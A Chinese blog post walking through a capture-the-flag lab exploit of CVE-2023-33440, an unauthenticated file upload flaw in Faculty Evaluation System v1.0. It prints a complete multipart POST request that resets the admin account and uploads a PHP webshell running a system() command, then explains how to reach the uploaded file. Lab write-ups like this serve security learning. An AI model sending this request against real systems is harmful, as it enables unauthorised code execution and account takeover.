春秋云境 | 文件上传 | CVE-2023-33440

最新推荐文章于 2024-08-24 07:40:34 发布
最新推荐文章于 2024-08-24 07:40:34 发布
阅读量150 收藏
点赞数 2
分类专栏: 春秋云境靶场 文章标签: web安全 网络安全 安全 经验分享
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_68416970/article/details/140910749
版权

靶标介绍

Faculty Evaluation System v1.0 存在未授权任意文件上传漏洞漏洞

开启靶场

页面如下

目录扫描

使用御剑扫描

访问下面这个链接

http://eci-2ze0lpvzvikzi704zsn3.cloudeci1.ichunqiu.com/login.php

需要登录,暂且不登录,直接刷新页面抓包,发送到 repeater

修改 POC

注意:Host 和 referer 参数中的域名使用自己抓包抓到的数据

POST /ajax.php?action=update_user HTTP/1.1
Host: eci-2ze0lpvzvikzi704zsn3.cloudeci1.ichunqiu.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Referer: http://eci-2ze0lpvzvikzi704zsn3.cloudeci1.ichunqiu.com/index.php
Content-Length: 752
Content-Type: multipart/form-data; boundary=---------------------------166782539326470
Connection: close

-----------------------------166782539326470
Content-Disposition: form-data; name="id"

1
-----------------------------166782539326470
Content-Disposition: form-data; name="firstname"

Administrator
-----------------------------166782539326470
Content-Disposition: form-data; name="lastname"

a
-----------------------------166782539326470
Content-Disposition: form-data; name="email"

admin@admin.com
-----------------------------166782539326470
Content-Disposition: form-data; name="password"

admin
-----------------------------166782539326470
Content-Disposition: form-data; name="img"; filename="php.php"
Content-Type: application/octet-stream

<?php system("cat /flag");?>
-----------------------------166782539326470--

获取 flag

响应包中的 avatar 拼接到 URL 后面访问,然后得到了 flag

/assets/uploads/1722769380_php.php

燕雀安知鸿鹄之志哉.
关注
  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CVE-2023-33440~文件上传春秋云境靶场渗透】
weixin_67832625的博客
08-04 494
主要是因为靶场资源较少,发一篇避坑教程~~~
春秋云境 | 文件上传 | CVE-2022-29464
weixin_68416970的博客
08-04 623
WSO2文件上传漏洞(CVE-2022-29464)是Orange Tsai发现的WSO2上的严重漏洞。该漏洞是一种未经身份验证的无限制任意文件上传,允许未经身份验证的攻击者通过上传恶意JSP文件在WSO2服务器上获得RCE。
春秋云境CVE-2023-1313任意文件上传漏洞实战
whoami
08-03 354
春秋云境CVE-2023-1313任意文件上传漏洞实战
春秋云境 | 文件上传 | CVE-2022-30887
weixin_68416970的博客
08-06 788
多语言药房管理系统 (MPMS) 是用 PHP 和 MySQL 开发的, 该软件的主要目的是在药房和客户之间提供一套接口,客户是该软件的主要用户。该软件有助于为药房业务创建一个综合数据库,并根据到期、产品等各种参数提供各种报告。该CMS中php_action/editProductImage.php存在任意文件上传漏洞,进而导致任意代码执行。
春秋云境 | 文件上传 | CVE-2022-23880
weixin_68416970的博客
08-07 390
taoCMS v3.0.2 文件管理处存在任意文件上传漏洞,攻击者可执行任意代码。
春秋云境 | 文件上传 | CVE-2022-28525
weixin_68416970的博客
08-06 227
ED01-CMS v20180505 存在任意文件上传漏洞。
春秋云境CVE-2023-1313
m0_64432806的博客
03-27 727
春秋云境CVE-2023-1313 cockpit在2.4.1版本之前存在任意文件上传漏洞PS:通过在浏览器中打开/install来运行安装
春秋云境CVE-2023-51048 闪灵S-CMS v5.0 后台SQL注入漏洞
HMX404的博客
04-17 601
S-CMS v5.0 被发现存在SQLI。
春秋云境CVE-2023-37569
2303_76653367的博客
05-11 236
Online Piggery Management System v1.0 - 存在未授权的文件上传漏洞。1.打开靶场,发现需要登录,密码为admin/password,当时我没猜出来又懒得爆破,直接参考。3.点击右边加号,随便填写信息,上传一句话木马,后缀为jpg。非常简单的文件上传,唯一的难点就是猜密码。5.右键上传的文件,得到文件存放链接。2.进入过后直接找上传文件的地方。4.抓包,将jpg改为php。
Gila CMS 文件上传漏洞(CVE-2020-28692)
玄道的网安博客
12-18 1174
简介 Gila CMS是一套基于PHP和MySQL的开源内容管理系统(CMS) 洞概述 攻击者可利用该漏洞可以上传shell到tmp directy,并通过logs函数滥用.htaccess来执行PHP文件。 影响版本 Gila CMS 1.16.0版本存在安全漏洞 环境搭建 到GitHub上下载源码 https://github.com/GilaCMS/gila/archive/1.16.0.zip 访问后台页面成功即为安装完成 漏洞复现 登录用户 漏洞url /ad.
春秋云境CVE-2022-29464
07-28
- *1* [【春秋云境CVE-2022-29464](https://blog.csdn.net/ZXW_NUDT/article/details/129159816)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_...
春秋云境CVE-2022-29464
09-05
春秋云境CVE-2022-29464是指WSO2 API Manager 文件上传漏洞的CVE编号。这个漏洞允许攻击者通过上传恶意文件来执行任意代码,进而导致服务器受到攻击。根据引用,在GitHub上有一个项目,其中包含了与该漏洞相关的利用...
春秋云境CVE-2022-23880
11-29
根据提供的引用内容,春秋云境是一个靶场,其中包含了一个名为taoCMS v3.0.2的文件管理系统,该系统存在任意文件上传漏洞CVE-2022-23880。攻击者可以利用该漏洞上传恶意文件并执行任意代码。如果您想了解更多关于该...
春秋云境CVE-2022-23906
08-03
春秋云境中的CVE-2022-23906是指CMS Made Simple v2.2.15存在一个通过上传图片功能的远程命令执行(RCE)漏洞。攻击者可以通过精心制作的图像文件来利用此漏洞。[2]如果你想了解更多关于该漏洞的信息,你可以查看这...
网络安全售前入门02——产品了解
最新发布
打工人
08-24 699
WEB应用防火墙也叫简称WAF。对Web应用系统进行防护,通过WAF的安全防护能力,保障Web应用系统的正常、稳定运行。有硬件版与软件版,也有云WAF(通过域名解释重定向到安全厂商云上进行流量清洗再打回给企业业务系统上)。下面以硬件版WAF作为例子展开介绍。
2024年入职/转行网络安全,该如何规划?_网络安全职业规划
2401_85023531的博客
08-23 1608
前段时间,知名机构麦可思研究院发布了《2022年中国本科生就业报告》,其中详细列出近五年的本科绿牌专业,其中,信息安全位列第一。
如何用3个月零基础入门网络安全?_网络安全零基础怎么学习
2401_84466224的博客
08-23 1587
我们知道计算机最早是在西方发明出来的,很多名词或者代码都是英文的,甚至现有的一些教程最初也是英文原版翻译过来的,而且一个漏洞被发现到翻译成中文一般需要一个星期的时间,在这个时间差上漏洞可能都修补了。”答案是否定的,黑客用的电脑,不需要什么高的配置,只要稳定就行.因为黑客所使用的一些程序,低端CPU也可以很好的运行,而且不占什么内存.还有一个,黑客是在DOS命令下对进行的,所以电脑能使用到最佳状态!观看学习近十年所有0day挖掘的帖,然后搭建环境,去复现漏洞,去思考学习笔者的挖洞思维,培养自己的渗透思维。
CVE-2023-33440
06-19
CVE-2023-33440是一个安全漏洞的编号,它通常代表某个软件或系统中的安全漏洞。这些漏洞是由CERT(Common Vulnerabilities and Exposures)项目分配的,用来统一标识全球范围内的信息安全漏洞。然而,由于漏洞的详细...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值